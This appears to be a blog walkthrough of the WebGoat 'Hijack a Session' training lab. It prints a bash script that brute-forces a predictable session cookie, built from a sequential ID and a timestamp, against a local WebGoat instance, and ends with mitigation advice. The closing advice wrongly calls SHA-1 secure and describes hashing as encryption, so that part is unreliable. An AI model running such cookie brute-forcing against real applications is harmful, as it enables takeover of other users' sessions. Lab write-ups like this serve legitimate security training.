In this walk through, we will be going through the Hijack a Session vulnerability section from Webgoat Labs. We will be exploring and exploiting Session Hijacking in various applications and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
Hijack a session
- In this challenge, we have to gain access to an authenticated session belonging to someone else by predicting the hijack_cookie value.
- I looked into the cookie in the storage section of our dev tools and try to decode it in my own way.
- The cookie value has 2 parts. The second one is the Unix Timestamp of UTC time when the cookie was created.
- Ideally we can bruteforce the cookie value then by incrementing the time value in the second part.
- I used the below script for the cookie value bruteforcing.
# !/bin/bash username=test password=test JSESSIONID="ek-lLMw7nb30j0quuVYTRvvtMAICq4w-yZwJfuuz" sessionFoundId=0 sessionFoundStartTime=0 sessionFoundEndTime=0 currentSessionId=0 previousSessionId=0 currentSessionTimestamp=0 previousSessionTimestamp=0 echo "================= Searching for session ==================================" echo for request in $(seq 1 1000); do currentSession="$(curl -i -v -X POST "http://localhost/WebGoat/HijackSession/login/?username=$username&password=$password" -H "Cookie: JSESSIONID=$JSESSIONID;" 2>&1 | grep hijack_cookie | grep -v "< Set-Cookie:" | cut -d'=' -f2 | cut -d';' -f1)" currentSessionId="$(echo $currentSession | cut -d'-' -f1)" currentSessionTimestamp="$(echo $currentSession | cut -d'-' -f2)" echo $currSessId - $currTS if ! [ -z $previousSessionId ] then if [ $((currentSessionId - previousSessionId)) -eq 2 ] then echo echo "Session found: $previousSessionId - $currentSessionId" echo sessionFoundId=$((previousSessionId+1)) sessionFoundStartTime=$previousSessionTimestamp sessionFoundEndTime=$currentSessionTimestamp break fi fi previousSessionId=$currentSessionId previousSessionTimestamp=$currentSessionTimestamp done echo echo "================= Session Found: $sessionFoundId =================" echo echo "| From timestamps $sessionFoundStartTime to $sessionFoundEndTime |" echo echo "================= Starting session for $sessionFoundId at $sessionFoundStartTime =================" echo for timestamp in $(seq -f %1.0f $sessionFoundStartTime $sessionFoundEndTime); do response=$(curl -v -X POST "http://localhost/WebGoat/HijackSession/login/?username=$username&password=$password" -H "Cookie: JSESSIONID=$JSESSIONID; hijack_cookie=$sessionFoundId-$timestamp;secure;" 2>&1 | grep feedback | cut -d':' -f2) echo $sessionFoundId-$timestamp: $response done
Also Read: Webgoat – Cross-Site Request Forgeries
Conclusion:
So, we finally completed the Webgoat Hijack a Session Vulnerability section. Next, we can mitigate these types of attacks by using a random session generation algorithm and encrypting it with a secure hashing algorithm like SHA-1 and SHA-256. Along with some cookie attributes set to HttpOnly Flag and Secure Flag. On that note, i will take your leave and will meet you in next one with another Webgoat vulnerability writeup, till then “Keep Hacking”.